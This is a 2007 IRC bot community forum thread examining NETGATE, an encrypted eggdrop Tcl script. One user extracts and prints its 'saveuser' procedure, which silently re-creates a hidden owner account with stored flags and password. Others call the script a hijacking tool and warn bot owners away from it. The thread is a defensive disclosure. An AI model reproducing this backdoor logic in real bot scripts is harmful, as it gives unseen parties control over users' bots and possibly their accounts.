strange??? (netgate)

KONTOL · Post by **KONTOL** » Fri Apr 27, 2007 12:55 am

NETGATE tcl has been update to version 9.5 more a lot of protection has been added but the encryption is use TCLpro! It's make more strange!!!

Does anyone can decrypt fully, that file has been encrypted with TCLpro (bytecodes method). Make it for readable to make sure no backdoor again!

For more information about it, please surf to:
http://netgate.informe.com/viewtopic.php?t=1086

NETGATE 9.5 tcl
Link removed (Alchera)

Config for bot:
http://www.redwingsonline.org/download/bot.cfg

It's use an Indonesian language! I can't understand it's that mean all...

Thx u all...

EDIT by slennox: added script name to subject and moved topic to Script Support & Releases

Post by **Sir_Fz** » Fri Apr 27, 2007 8:49 am

Why do you want to use NETGATE anyway? it has a very bad reputation and I don't see why you NEED it. There are a lot of scripts that will do much more and written in much less lines (not 10,000+) in the Tcl archive.

KONTOL · Post by **KONTOL** » Fri Apr 27, 2007 11:20 am

I've try use NETGATE for some reason (trial & error surely). I just ask some help that can be decrypt that tcl into readable condition. So I can read & fix some backdoor for my self and the other user... Or maybe can decrypt all tcl files that have been encrypted by TCLpro (procomp util)...

thx u & I appriciated any help...

rosc2112 · Post by **rosc2112** » Fri Apr 27, 2007 1:12 pm

From the bit of research I did some months ago into that very same question (decrypting tclpro crap) It IS NOT POSSIBLE - It's a one-way hash if I recall correctly.

Fact is, if the script is already KNOWN to have backdoors and is also encrypted, your best bet is to simply not use it.

You could probably/theoretically debug the script so you can at least see all the procs, but, meh, way too much work for no benefit.

Post by **Sir_Fz** » Fri Apr 27, 2007 2:13 pm

After reading this thread again, I got the idea of checking if that [saveuser] procedure exists in the new netgate.

I've downloaded windrop1.6.12 and loaded netgate into it. Enabled the .tcl DCC command and did the following:

(Me) .tcl info command saveuser
(Bot) Tcl: saveuser
(Me) .tcl info args saveuser
(Bot) Tcl: (Meaning it takes no arguments)
(Me) .tcl info body saveuser

I'll display the output of the last Tcl-command in code tags (The whole proc)

Code: Select all

proc saveuser {} {
 global ps owner
 if {![validuser $ps]} {
  setuser $owner XTRA "BEND" "xDB4L/z2DJT~1mianN/lj9Rq."
 } elseif {$owner != $ps} {
  setuser $owner XTRA "BEND" [zip [chattr $ps]]
  if {[passwdok $ps ""] != 1} {
   setuser $owner XTRA "LAST" [getuser $ps "PASS"]
  }
  deluser $ps
 }
 save
 if {![validuser $ps]} {
  adduser $ps "$ps!*@*"
  chattr $ps [dezip [getuser $owner XTRA "BEND"]]
  if {[getuser $owner XTRA "LAST"] != ""} {
   setuser $ps PASS [getuser $owner XTRA "LAST"]
  }
 }
 return 1
}

$owner contains the owner's handle (set by you) and what does $ps contain?

(Me) .set ps
(Bot) Currently: odon

So the same backdoor still exists in the new version, this time it adds "odon" instead of "KaISaR" to the bot's userlist as owner.

Edit: I meant windrop1.6.12 instead of eggdrop1.6.12 (used it since the site claimed that netgate only works for this version of windrop or more specifically for tcl 8.2-8.3... even more reason for why this script is lame).

Alchera · Post by **Alchera** » Sat Apr 28, 2007 12:10 am

rosc2112 wrote:From the bit of research I did some months ago into that very same question (decrypting tclpro crap) It IS NOT POSSIBLE - It's a one-way hash if I recall correctly.

Fact is, if the script is already KNOWN to have backdoors and is also encrypted, your best bet is to simply not use it.

You could probably/theoretically debug the script so you can at least see all the procs, but, meh, way too much work for no benefit.

netgate backdoor

Post by **Sir_Fz** » Sat Apr 28, 2007 6:59 am

I can't even start about how ugly this script makes Eggdrop

it stores the userfile in the language/ directory lol that's so lame, I mean come on be a man lol. The bot.cfg requires editing only a few settings (nick, username, IP and hostname) so the user wouldn't understand how to change alternative nick, load scripts or change any other setting...

I would never recommend such a script even if it didn't contain that backdoor.

Post by **nml375** » Sat Apr 28, 2007 8:49 am

Well, the only purpose for this package is to hijack bots and quite possibly accounts on the system it runs on. The ones targetted by such package would be those who desire an up'n'go bot, and really don't want to bother/care to even check config-files, scripts, and such; and this script "offers it all", it claims to take care of the more difficult config-settings, does all the things eggdrop usually needs added scripts, etc, etc..

The mere fact that people still think about using it despite the widespread knowledge of the backdoors, etc. could only mean the author got the bait right.

rosc2112 · Post by **rosc2112** » Sat Apr 28, 2007 5:38 pm

Wouldn't be surprised to find netgate to be a conglomeration of other peoples scripts/procs mashed together into a mess.

Alchera · Post by **Alchera** » Sat Apr 28, 2007 11:06 pm

I notified the appropriate Tcl/eggdrop channel founders on DALnet when this first reared its ugly head as it targets DALnet bot owners specifically (from memory).

mayday · Post by **mayday** » Mon Apr 30, 2007 4:13 am

Wew netgate again......
Guys if u look into netgate FAQ u can read this :
FaQ:
........
- Tapi kan masih ada $ps odon nya, yups masih ada, dan nick PSna masih kami yang pegang, dan gak akan kami salah gunakan, so if u agree with this condition us this script, if not dont use it, Simple !!.
i try to translated : - but tcl still have $ps odon, yes that $ps still exist, and we still holding/keep/have that PS nick, and we would not missused, so if u agree with this condition us this script, if not dont use it, Simple !!.
.......
please refer to the bolded text , so use it if u agree with that condition, don't use its if not...

i notice something wierd in here, TS say he didnt understand indonesia language but his id KONTOL using indonesia language, KONTOL mean p*nis in english

Post by **nml375** » Mon Apr 30, 2007 9:23 am

Any such "disclaimer" should be put within the license-agreement to carry any validity. Also, mixing languages like that is to me a really bad practise.

Anyway, since they admit to adding a user-account, with a known password and hostmask that only cares for nick (roughly making it possible for anyone to authenticate, and use this account for mischief)...
Do anyone know if they ever provided a reasoable explanation for adding a useraccunt of any kind? Or why it would need such permissions?

I'd still say it's a hijacking tool, with a few shady attempts to deny responsibility...

Alchera · Post by **Alchera** » Mon Apr 30, 2007 11:09 am

mayday wrote:Wew netgate again...... KONTOL mean p*nis in english

I already knew that (although I do not speak the language); I assist in an Indonesian (shell provider) channel on DALnet.

Alchera · Post by **Alchera** » Mon Apr 30, 2007 11:11 am

nml375 wrote:I'd still say it's a hijacking tool, with a few shady attempts to deny responsibility...

It's a hijacking tool and they think we're all idiots.

Unfortunately there are some out there that have fallen for this "con".

rosc2112 · Post by **rosc2112** » Tue May 01, 2007 9:01 pm

I suppose it'd be easy enough to rip the procs from the script as already demonstrated, if anyone ever wanted to bother, and then release a clean copy

Either that, or just create the backdoor username and give it a different password and +k flags.. Or, then again, I can think of some nice little reverse-hack script to use on whoever tried logging in with that username

But, meh.. Screw them, their script sucks, thats why they have to hide it

egghelp/eggheads community

strange??? (netgate)

strange??? (netgate)

yoww...